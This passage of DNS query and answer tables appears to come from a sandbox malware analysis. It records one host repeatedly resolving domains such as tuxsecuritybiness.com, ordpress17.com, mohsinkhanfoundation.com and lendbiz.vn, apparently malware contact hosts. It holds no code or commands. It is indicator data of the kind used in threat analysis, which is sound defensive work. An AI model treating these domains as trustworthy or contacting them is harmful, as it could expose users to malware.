                                          Sep 27, 2021 20:27:13.213284969 CEST192.168.2.78.8.8.80xc17aStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:13.980892897 CEST192.168.2.78.8.8.80xbf1cStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:14.761775017 CEST192.168.2.78.8.8.80xa512Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:15.560414076 CEST192.168.2.78.8.8.80xa5c0Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:16.340569019 CEST192.168.2.78.8.8.80x97ffStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:17.120476007 CEST192.168.2.78.8.8.80x85a3Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:17.918859959 CEST192.168.2.78.8.8.80x88e5Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:18.677347898 CEST192.168.2.78.8.8.80xaac1Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:19.852977037 CEST192.168.2.78.8.8.80xbc6fStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:20.666625977 CEST192.168.2.78.8.8.80xaab9Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:21.464464903 CEST192.168.2.78.8.8.80x2098Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:22.228491068 CEST192.168.2.78.8.8.80xbcbbStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:23.027650118 CEST192.168.2.78.8.8.80x5f23Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:23.797799110 CEST192.168.2.78.8.8.80xcd2aStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:24.591423988 CEST192.168.2.78.8.8.80xdd12Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:25.383204937 CEST192.168.2.78.8.8.80x16d4Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:26.638611078 CEST192.168.2.78.8.8.80xd6e4Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:28.365613937 CEST192.168.2.78.8.8.80x4f05Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:29.136183977 CEST192.168.2.78.8.8.80x4806Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:29.932790041 CEST192.168.2.78.8.8.80x493eStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:30.744966030 CEST192.168.2.78.8.8.80x8e55Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:31.530476093 CEST192.168.2.78.8.8.80x509Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:32.291270971 CEST192.168.2.78.8.8.80x1e02Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:33.093796968 CEST192.168.2.78.8.8.80x8a56Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:33.907108068 CEST192.168.2.78.8.8.80x67fcStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:34.684026003 CEST192.168.2.78.8.8.80x958cStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:35.466766119 CEST192.168.2.78.8.8.80x4b1aStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:37.263170004 CEST192.168.2.78.8.8.80xb448Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:38.028683901 CEST192.168.2.78.8.8.80x3aadStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:38.809356928 CEST192.168.2.78.8.8.80x834cStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:39.607177973 CEST192.168.2.78.8.8.80xc895Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:40.668811083 CEST192.168.2.78.8.8.80x17Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:41.427077055 CEST192.168.2.78.8.8.80x6290Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:42.570655107 CEST192.168.2.78.8.8.80xcab3Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:43.368947983 CEST192.168.2.78.8.8.80xfa04Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:44.244988918 CEST192.168.2.78.8.8.80xf4b3Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:45.531595945 CEST192.168.2.78.8.8.80xf868Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:47.080384016 CEST192.168.2.78.8.8.80xf868Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:47.887803078 CEST192.168.2.78.8.8.80x63f5Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:48.671917915 CEST192.168.2.78.8.8.80x4b69Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Sep 27, 2021 20:25:46.122905970 CEST8.8.8.8192.168.2.70xed48No error (0)hoteloaktree.com185.67.1.94A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:46.477045059 CEST8.8.8.8192.168.2.70x1ca0Name error (3)aterwellnessinc.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:46.642173052 CEST8.8.8.8192.168.2.70x61fcNo error (0)sirifinco.com162.215.253.14A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:47.184863091 CEST8.8.8.8192.168.2.70xe91No error (0)sirifinco.com162.215.253.14A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:47.781789064 CEST8.8.8.8192.168.2.70x43e8Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:47.826519966 CEST8.8.8.8192.168.2.70x292aNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:48.585489988 CEST8.8.8.8192.168.2.70xe508Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:48.621702909 CEST8.8.8.8192.168.2.70x3911No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:49.407346964 CEST8.8.8.8192.168.2.70xd446Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:49.445404053 CEST8.8.8.8192.168.2.70x2283No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:49.454132080 CEST8.8.8.8192.168.2.70xd318No error (0)r3.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 20:25:49.538041115 CEST8.8.8.8192.168.2.70xeb28No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 20:25:50.391757965 CEST8.8.8.8192.168.2.70xa5ddName error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:50.409461975 CEST8.8.8.8192.168.2.70xa668No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:51.694057941 CEST8.8.8.8192.168.2.70x144eName error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:51.713299990 CEST8.8.8.8192.168.2.70x5b79No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:52.400687933 CEST8.8.8.8192.168.2.70x524eName error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:52.419859886 CEST8.8.8.8192.168.2.70x5cc9No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:52.537311077 CEST8.8.8.8192.168.2.70x2148Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:53.120194912 CEST8.8.8.8192.168.2.70x4064Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:53.141144037 CEST8.8.8.8192.168.2.70x1c01No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.043450117 CEST8.8.8.8192.168.2.70xd66eName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.108280897 CEST8.8.8.8192.168.2.70xf44eName error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.125935078 CEST8.8.8.8192.168.2.70x26daNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.815829992 CEST8.8.8.8192.168.2.70xeb44Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.867284060 CEST8.8.8.8192.168.2.70x4e0cName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.867326021 CEST8.8.8.8192.168.2.70xdb52No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:55.739996910 CEST8.8.8.8192.168.2.70xe43eName error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:55.782393932 CEST8.8.8.8192.168.2.70x1154Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:55.782442093 CEST8.8.8.8192.168.2.70xb28bNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:56.433779955 CEST8.8.8.8192.168.2.70x3a39Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:56.451993942 CEST8.8.8.8192.168.2.70xd9c3No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:57.121294022 CEST8.8.8.8192.168.2.70x8f3aName error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:57.141964912 CEST8.8.8.8192.168.2.70xa53fNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:57.813699007 CEST8.8.8.8192.168.2.70xba03Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:57.878588915 CEST8.8.8.8192.168.2.70x6ec4No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:58.589430094 CEST8.8.8.8192.168.2.70xa662Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:58.607362032 CEST8.8.8.8192.168.2.70x6f6dNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:59.640908003 CEST8.8.8.8192.168.2.70xd3a7Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:00.669476986 CEST8.8.8.8192.168.2.70xa418Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:00.693370104 CEST8.8.8.8192.168.2.70x5202No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:01.344700098 CEST8.8.8.8192.168.2.70x485aName error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:01.365263939 CEST8.8.8.8192.168.2.70x833No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:01.464349031 CEST8.8.8.8192.168.2.70x7abbName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:02.052011013 CEST8.8.8.8192.168.2.70xad79Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:02.070492029 CEST8.8.8.8192.168.2.70x74e4No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:02.400717974 CEST8.8.8.8192.168.2.70x8d2cName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:02.827584028 CEST8.8.8.8192.168.2.70xb84cName error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:02.848720074 CEST8.8.8.8192.168.2.70x14a9No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:03.362535954 CEST8.8.8.8192.168.2.70x291bName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:03.554991007 CEST8.8.8.8192.168.2.70xc730Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:03.594930887 CEST8.8.8.8192.168.2.70x8caaNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:04.184688091 CEST8.8.8.8192.168.2.70x58ddName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:04.267692089 CEST8.8.8.8192.168.2.70xe1abName error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:04.285075903 CEST8.8.8.8192.168.2.70xd25eNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:05.009361982 CEST8.8.8.8192.168.2.70x3ae2Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:05.011293888 CEST8.8.8.8192.168.2.70x1cc3Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:05.030112982 CEST8.8.8.8192.168.2.70xe823No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:05.771013975 CEST8.8.8.8192.168.2.70x3261Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:05.792582989 CEST8.8.8.8192.168.2.70xc32dNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:05.829721928 CEST8.8.8.8192.168.2.70xb3e9Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:06.530939102 CEST8.8.8.8192.168.2.70x919bName error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:06.563410044 CEST8.8.8.8192.168.2.70xe31fNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:06.621680975 CEST8.8.8.8192.168.2.70xa05dName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:07.260509968 CEST8.8.8.8192.168.2.70xd3ceName error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:07.277765036 CEST8.8.8.8192.168.2.70x58caNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:07.441679001 CEST8.8.8.8192.168.2.70x700eName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:08.027592897 CEST8.8.8.8192.168.2.70x4928No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:08.230581999 CEST8.8.8.8192.168.2.70xefa0Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:08.688290119 CEST8.8.8.8192.168.2.70xf5e3No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:09.041362047 CEST8.8.8.8192.168.2.70xa130Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:09.381016970 CEST8.8.8.8192.168.2.70xd860No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:09.837686062 CEST8.8.8.8192.168.2.70xc058Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:10.057593107 CEST8.8.8.8192.168.2.70x92c1No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:10.650757074 CEST8.8.8.8192.168.2.70x4737Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:10.779675007 CEST8.8.8.8192.168.2.70xbe06No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:11.434880018 CEST8.8.8.8192.168.2.70x35cbName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:11.473371029 CEST8.8.8.8192.168.2.70x24e3No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:12.172019005 CEST8.8.8.8192.168.2.70xc921No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:12.266151905 CEST8.8.8.8192.168.2.70xe6bfName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:12.873389006 CEST8.8.8.8192.168.2.70x4c70No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:13.035274029 CEST8.8.8.8192.168.2.70x237cName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:13.532562971 CEST8.8.8.8192.168.2.70x9e77No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:13.821945906 CEST8.8.8.8192.168.2.70xbb50Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:14.169934034 CEST8.8.8.8192.168.2.70x6d56No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:14.628648996 CEST8.8.8.8192.168.2.70xd043Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:14.825664997 CEST8.8.8.8192.168.2.70x2fd3No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:15.422096014 CEST8.8.8.8192.168.2.70x812fName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:15.511173010 CEST8.8.8.8192.168.2.70xea9eNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:16.141031981 CEST8.8.8.8192.168.2.70x7afcNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:16.192023039 CEST8.8.8.8192.168.2.70xf614Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:16.948764086 CEST8.8.8.8192.168.2.70xddbeNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:17.006040096 CEST8.8.8.8192.168.2.70x7a5cName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:18.324116945 CEST8.8.8.8192.168.2.70x158No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:18.394996881 CEST8.8.8.8192.168.2.70xd7a6Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:20.000881910 CEST8.8.8.8192.168.2.70xdbb7No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:20.170842886 CEST8.8.8.8192.168.2.70x3925Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:20.775252104 CEST8.8.8.8192.168.2.70xc814No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:20.935945034 CEST8.8.8.8192.168.2.70x83cName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:21.468765020 CEST8.8.8.8192.168.2.70xe784No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:21.708801985 CEST8.8.8.8192.168.2.70xa76Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:22.167949915 CEST8.8.8.8192.168.2.70x466No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:22.951903105 CEST8.8.8.8192.168.2.70x53b6No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:22.955353975 CEST8.8.8.8192.168.2.70x7a15Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:23.635545015 CEST8.8.8.8192.168.2.70xd20fNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:23.715049982 CEST8.8.8.8192.168.2.70x6a7eName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:24.508251905 CEST8.8.8.8192.168.2.70x9b3bName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:24.589466095 CEST8.8.8.8192.168.2.70x453aNo error (0)lendbiz.vn103.28.36.212A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:25.375384092 CEST8.8.8.8192.168.2.70x3b7dName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:25.998867989 CEST8.8.8.8192.168.2.70x8590No error (0)lendbiz.vn103.28.36.212A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:26.173239946 CEST8.8.8.8192.168.2.70x992eName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:26.961611032 CEST8.8.8.8192.168.2.70xfeacName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:27.560750008 CEST8.8.8.8192.168.2.70xfa21No error (0)lendbiz.vn103.28.36.212A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:27.738198042 CEST8.8.8.8192.168.2.70x2aaName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:28.503357887 CEST8.8.8.8192.168.2.70x8f26Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:28.813460112 CEST8.8.8.8192.168.2.70x8c90No error (0)lendbiz.vn103.28.36.212A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:29.346869946 CEST8.8.8.8192.168.2.70x7eabName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:30.032093048 CEST8.8.8.8192.168.2.70x3c23No error (0)lendbiz.vn103.28.36.212A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:30.117753983 CEST8.8.8.8192.168.2.70x84d6Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:30.926594019 CEST8.8.8.8192.168.2.70xc32Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:31.333245039 CEST8.8.8.8192.168.2.70xb007No error (0)lendbiz.vn103.28.36.212A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:31.706501007 CEST8.8.8.8192.168.2.70xf59bName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:32.493242025 CEST8.8.8.8192.168.2.70xde6Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:33.290030003 CEST8.8.8.8192.168.2.70x7889Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:34.101382017 CEST8.8.8.8192.168.2.70x5b34Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:34.882970095 CEST8.8.8.8192.168.2.70x6794Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:35.861495018 CEST8.8.8.8192.168.2.70x3f6Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:37.436501026 CEST8.8.8.8192.168.2.70x9487Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:39.235862017 CEST8.8.8.8192.168.2.70x5074Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:40.133714914 CEST8.8.8.8192.168.2.70x6e95Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:40.944011927 CEST8.8.8.8192.168.2.70x49c9Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:41.798176050 CEST8.8.8.8192.168.2.70x466bName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:45.599760056 CEST8.8.8.8192.168.2.70x8974Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:46.371422052 CEST8.8.8.8192.168.2.70x5395Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:47.175295115 CEST8.8.8.8192.168.2.70x7728Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:47.936333895 CEST8.8.8.8192.168.2.70x575cName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:48.726948023 CEST8.8.8.8192.168.2.70x3d0Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:49.514455080 CEST8.8.8.8192.168.2.70x9832Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:50.284754992 CEST8.8.8.8192.168.2.70xab34Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:51.046055079 CEST8.8.8.8192.168.2.70x127bName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:51.814224958 CEST8.8.8.8192.168.2.70xa24aName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:52.581841946 CEST8.8.8.8192.168.2.70xa0dbName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:53.363605022 CEST8.8.8.8192.168.2.70xd59bName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:55.205689907 CEST8.8.8.8192.168.2.70xfc2eName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:56.010369062 CEST8.8.8.8192.168.2.70x6bebName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
